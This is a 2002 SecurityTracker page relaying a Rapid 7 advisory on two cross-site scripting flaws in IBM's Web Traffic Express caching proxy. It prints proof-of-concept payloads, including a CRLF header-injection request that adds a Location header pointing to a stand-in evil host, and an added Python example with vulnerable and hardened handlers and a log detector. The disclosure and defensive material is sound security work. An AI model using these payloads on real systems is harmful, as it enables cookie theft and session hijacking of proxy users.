SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
Category:  Application (Web Server/CGI)  >  Web Traffic Express Vendors:  IBM
IBM Web Traffic Express Caching Proxy Server Allows Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1005472
CVE Reference:  CAN-2002-1167 ,  CAN-2002-1168
Date:  Oct 23 2002
Impact:  User access via network
Fix Available:  Yes   Exploit Included:  Yes   Vendor Confirmed:  Yes  
Advisory:  Rapid 7
Version(s): 3.6, 4.x
Description:  Some input validation flaws were reported in the IBM Web Traffic Express Caching Proxy Server. A remote user can conduct cross-site scripting attacks against proxy users.

Rapid 7 issued an advisory warning of two cross-site scripting flaws. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the proxy server and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the proxy server, access data recently submitted by the target user via web form to the server, or take actions on the server acting as the target user. A demonstration exploit is provided:

/"><img%20src="javascript:alert(document.domain)">

A remote user can also add a second "Location:" header by using %0a%0d, as shown below:

telnet [victim server] 80
Trying 192.168.100.1...
Connected to [victim server].
Escape character is '^]'.
GET
/%0a%0dLocation:%20http://[evil server]/"><img%20src="javascript:alert(document.domain)">
HTTP/1.0
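The two defects described above, shown side by side as an added Python example (not code from IBM, Rapid 7 or SecurityTracker): a naive redirect builder and error page that reproduce the reported behaviour (percent-decoded CR/LF reaching a Location header line, the request path echoed into HTML unescaped), the hardened counterparts a defender would want (reject control characters before they reach a header, HTML-escape the echoed path), and a small access-log check for the encoded line-break signature of the header-injection variant. The host names, log lines and function names are constructed for this example and are not from the advisory.

```python
import html
import re
from urllib.parse import unquote

# Constructed sample request paths modelled on the two payload shapes the
# advisory describes (not captured traffic); "evil.example" is a placeholder.
HEADER_INJECTION_PATH = (
    '/%0a%0dLocation:%20http://evil.example/"><img%20src="javascript:alert(1)">'
)
REFLECTED_XSS_PATH = '/"><img%20src="javascript:alert(document.domain)">'
BENIGN_PATH = "/index.html"

# Any CR/LF combination counts as a line terminator, as lenient clients do.
_LINE_END = re.compile(r"\r\n|\n\r|\r|\n")
# CR, LF and every other ASCII control character.
_CONTROL = re.compile(r"[\x00-\x1f\x7f]")
# Encoded or raw line breaks inside a request path.
_CRLF_IN_PATH = re.compile(r"%0[aAdD]|[\r\n]")


def parse_headers(header_block):
    """Split a raw response head into (name, value) pairs; the status line
    has no colon and is skipped."""
    headers = []
    for line in _LINE_END.split(header_block):
        if ":" in line:
            name, value = line.split(":", 1)
            headers.append((name.strip(), value.strip()))
    return headers


def count_header(header_block, name):
    """Number of headers called `name` (case-insensitive) in the block."""
    return sum(1 for n, _ in parse_headers(header_block) if n.lower() == name.lower())


def naive_redirect(host, raw_path):
    """'Before' behaviour modelled on the advisory: decode the path and splice
    it into a Location header. A decoded %0a%0d ends the header line, so the
    remainder of the path becomes a second Location header."""
    target = "http://%s%s" % (host, unquote(raw_path))
    return "HTTP/1.1 302 Found\r\nLocation: %s\r\n\r\n" % target


def safe_redirect(host, raw_path):
    """Hardened form: refuse any control character in the decoded value before
    it can reach a header line. Answering 400 instead of 'cleaning' the value
    avoids guessing how downstream parsers split lines."""
    decoded = unquote(raw_path)
    if _CONTROL.search(decoded):
        return "HTTP/1.1 400 Bad Request\r\nContent-Length: 0\r\n\r\n"
    return "HTTP/1.1 302 Found\r\nLocation: http://%s%s\r\n\r\n" % (host, decoded)


def naive_error_page(raw_path):
    """'Before' behaviour for the reflected XSS: the decoded path is echoed
    into HTML unescaped, so '">' closes the attribute and '<img' opens a tag."""
    return "<html><body>Not found: %s</body></html>" % unquote(raw_path)


def safe_error_page(raw_path):
    """Hardened form: HTML-escape the echoed path, quotes included."""
    escaped = html.escape(unquote(raw_path), quote=True)
    return "<html><body>Not found: %s</body></html>" % escaped


# Constructed common-log-format lines for the detection check (made up).
SAMPLE_LOG = [
    '10.0.0.5 - - [23/Oct/2002:12:16:08 -0700] "GET /index.html HTTP/1.0" 200 443',
    '10.0.0.9 - - [23/Oct/2002:12:16:09 -0700] "GET ' + HEADER_INJECTION_PATH + ' HTTP/1.0" 302 0',
    '10.0.0.9 - - [23/Oct/2002:12:16:10 -0700] "GET ' + REFLECTED_XSS_PATH + ' HTTP/1.0" 404 120',
]


def flag_suspicious(log_lines):
    """Return request paths that carry an encoded or raw line break, the
    signature of the header-injection variant in an access log."""
    hits = []
    for line in log_lines:
        m = re.search(r'"(?:GET|POST|HEAD) (\S+) HTTP/', line)
        if m and _CRLF_IN_PATH.search(m.group(1)):
            hits.append(m.group(1))
    return hits


if __name__ == "__main__":
    print("naive Location headers:", count_header(naive_redirect("victim.example", HEADER_INJECTION_PATH), "Location"))
    print("safe response:", safe_redirect("victim.example", HEADER_INJECTION_PATH).split("\r\n")[0])
    print("safe error page:", safe_error_page(REFLECTED_XSS_PATH))
    print("flagged paths:", flag_suspicious(SAMPLE_LOG))
```

The naive redirect yields two Location headers from the crafted path, while the hardened version never lets a control character reach a header line; the reflected-path case is fixed by escaping at the point of output rather than by filtering input, so `<`, `>` and `"` are preserved in the message but rendered inert. The log check matches only the encoded line-break variant; the plain reflected XSS path has no CR/LF and would need a separate rule for `"><` or `<img` in paths.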

Impact:  A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the vulnerable software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:  The vendor has released efix build number 4.0.1.26 for Caching Proxy Server v4.x. (see APAR# IY24527 and APAR# IY35139)

Users can install Caching Proxy efix build 4.0.1.26 or higher. Users running v3.6 should contact IBM support for more information on how to upgrade to a newer build.

Vendor URL:  www-3.ibm.com/software/webservers/wte/
Cause:  Input validation error
Underlying OS:  Linux (Any), UNIX (AIX), UNIX (Solaris - SunOS), Windows (NT)
Reported By:  "Rapid 7 Security Advisories" <advisory@rapid7.com>
Message History:   None.


 Source Message Contents

Date:  Wed, 23 Oct 2002 12:16:08 -0700
From:  "Rapid 7 Security Advisories" <advisory@rapid7.com>
Subject:  [VulnWatch] R7-0008: IBM WebSphere Edge Server Caching Proxy Cross-Site Scripting

 

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________
                     Rapid 7, Inc. Security Advisory

        Visit http://www.rapid7.com/ to download NeXpose(tm), our
         advanced vulnerability scanner. Linux and Windows 2000
                       versions are available now!
_______________________________________________________________________

Rapid 7 Advisory R7-0008
IBM WebSphere Edge Server Caching Proxy Cross-Site Scripting Issues

   Published:  October 23, 2002
   Revision:   1.0
   http://www.rapid7.com/advisories/R7-0008.txt

   o First XSS issue (standard XSS)
      IBM:        APAR# IY24527

      CVE:        CAN-2002-1167
      http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1167

      Bugtraq:    6000
      http://online.securityfocus.com/bid/6000

   o Second XSS issue (HTTP header injection)
      IBM:        APAR# IY35139

      CVE:        CAN-2002-1168
      http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1168

      Bugtraq:    6001
      http://online.securityfocus.com/bid/6001

1. Affected system(s):

   KNOWN VULNERABLE:
    o IBM Web Traffic Express Caching Proxy Server v4.x (bundled
      with IBM WebSphere Edge Server v2.0)
    o IBM Web Traffic Express Caching Proxy Server v3.6

2. Summary

   IBM Web Traffic Express Caching Proxy server is vulnerable to
   cross site scripting.  The Caching Proxy server allows script code
   to be injected into pages using standard cross-site scripting
   techniques.  A second, variant attack allows the HTTP headers to
   be manipulated.

   IBM now bundles Web Traffic Express v4.0 with WebSphere Edge Server
   v2.0.  IBM Web Traffic Express v3.6 and earlier were separately
   shipping products. 

3. Vendor status and information

   IBM Software
   http://www-3.ibm.com/software/webservers/edgeserver/index.html

      IBM was notified of this issue and has released efix build number
      4.0.1.26 for Caching Proxy Server v4.x, which fixes this issue
      and other security issues (see Rapid 7 advisory R7-0007 for more
      information: http://www.rapid7.com/advisories/R7-0007.txt ).
 
      IBM is tracking the first (standard) XSS issue as APAR# IY24527.
      IBM is tracking the second (header injection) XSS issue as
      APAR# IY35139.

4. Solution

   IBM customers should install Caching Proxy efix build 4.0.1.26 or
   higher.  Efix builds can be downloaded from IBM's secure FTP site.
   For more information on obtaining efix builds, contact IBM support
   with the APAR numbers listed above.

   The fixes have also been ported back to the Web Traffic Express v3.6
   code base.  Customers running v3.6 should contact IBM support for
   more information on how to upgrade to a newer build.

5. Detailed analysis

   There are two XSS techniques that can be used against the caching
   proxy server.  Please note that the following text may be
   wrapped or otherwise mangled by mail clients or gateways.  You
   should refer to the original advisory if there is a question about
   the exact text.

   a) Standard XSS exploit against Web Traffic Express Caching Proxy

   Request the following path from the caching proxy server:

      /"><img%20src="javascript:alert(document.domain)">

   b) XSS exploit against Web Traffic Express Caching Proxy, adding a
      second "Location:" header by using %0a%0d

   telnet www.victim.com 80
   Trying 192.168.100.1...
   Connected to www.victim.com.
   Escape character is '^]'.
   GET /%0a%0dLocation:%20http://www.evil.com/"><img%20src="javascript:alert(document.domain)"> HTTP/1.0

   HTTP/1.1 302 Found
   Server: IBM-PROXY-WTE-US/3.6
   Date: Fri, 18 Oct 2002 03:44:18 GMT
   Location: http://www.victim.com/;www.victim.com/
   Location: http:/www.evil.com/<img src="javascript:alert(document.domain)">
   Accept-Ranges: bytes
   Content-Type: text/html
   Content-Length: 443
   Last-Modified: Fri, 26 Jul 2002 03:44:18 GMT
   ...

6. Contact Information

   Rapid 7 Security Advisories
   Email: advisory@rapid7.com
   Web:   http://www.rapid7.com/
   Phone: +1 (212) 558-8700

7. Disclaimer and Copyright

   Rapid 7, Inc. is not responsible for the misuse of the information
   provided in our security advisories. These advisories are a service
   to the professional security community. There are NO WARRANTIES with
   regard to this information. Any application or distribution of this
   information constitutes acceptance AS IS, at the user's own risk.
   This information is subject to change without notice.

   This advisory Copyright (C) 2002 Rapid 7, Inc. Permission is hereby
   granted to redistribute this advisory, providing that no changes are
   made and that the copyright notices and disclaimers remain intact.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (OpenBSD)

iD8DBQE9tuwTcL76DCfug6wRAjNRAJ4qMUKne/vS+7k41XXYKS0wZ4PBFwCfdl8J
+BWWNXDgIxkFJT1tiKzaHW4=
=icsO
-----END PGP SIGNATURE-----


Copyright 2002, SecurityGlobal.net LLC